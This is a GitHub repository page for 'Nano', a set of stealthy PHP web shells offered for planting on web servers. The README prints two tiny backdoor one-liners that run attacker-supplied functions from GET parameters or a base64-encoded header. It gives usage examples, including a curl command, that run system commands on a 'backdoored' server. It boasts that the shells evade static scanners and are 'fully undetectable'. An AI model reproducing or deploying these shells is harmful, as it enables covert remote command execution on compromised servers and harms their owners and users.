Skip to content
Nano is a family of PHP web shells which are code golfed for stealth.
Branch: master
Clone or download
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
.gitattributes Update .gitattributes Jun 2, 2018
.whitesource Initial WhiteSource configuration file May 5, 2019
README.md short_open_tag = Off Oct 6, 2018
handler.py Added compatiblity for ninja's changed syntax May 27, 2018
nano.php bypass for short_open_tag = Off Oct 6, 2018
ninja.php bypass for short_open_tag = Off Oct 6, 2018

README.md

nano

Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient.
Put it on watch maybe, I will continue to upload more webshells in here.

Nano

<?=$_GET[p]==_&&$_GET[f]($GET_[c]);

Features

  • 35 bytes in size
  • Can't be detected by static code scanners
  • Supports authentication

Usage

http://example.com/nano.php?f=function&c=command&p=password

f is for function
c is for command
p is for password

For example, the code below will execute the ls command:

http://example.com/nano.php?f=system&c=ls&p=password

Ninja

<?=$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0]($x[1]);

Features

  • 93 bytes in size
  • Fully Undetectable

Usage

This one a bit complex.
Lets say you want to run system(ls) so write it as system~ls and then base64 encode it i.e. c3lzdGVtKGxzKQ==
Now add any 1 character at the start of it. Let say 'x' so it will be xc3lzdGVtKGxzKQ==
Now open your terminal and type the following command
curl -H 'x: xc3lzdGVtKGxzKQ==' http://example.com/backdoored.php
Too much work? You can use the handler instead.

handler

Everything Else

This is my first php thingy so if there's way to do what I did in a better way please let me know or open a pull request.
The nano project is licensed under MIT license which basically means you have to give me credit if you want to redistribute or modify it.

You can’t perform that action at this time.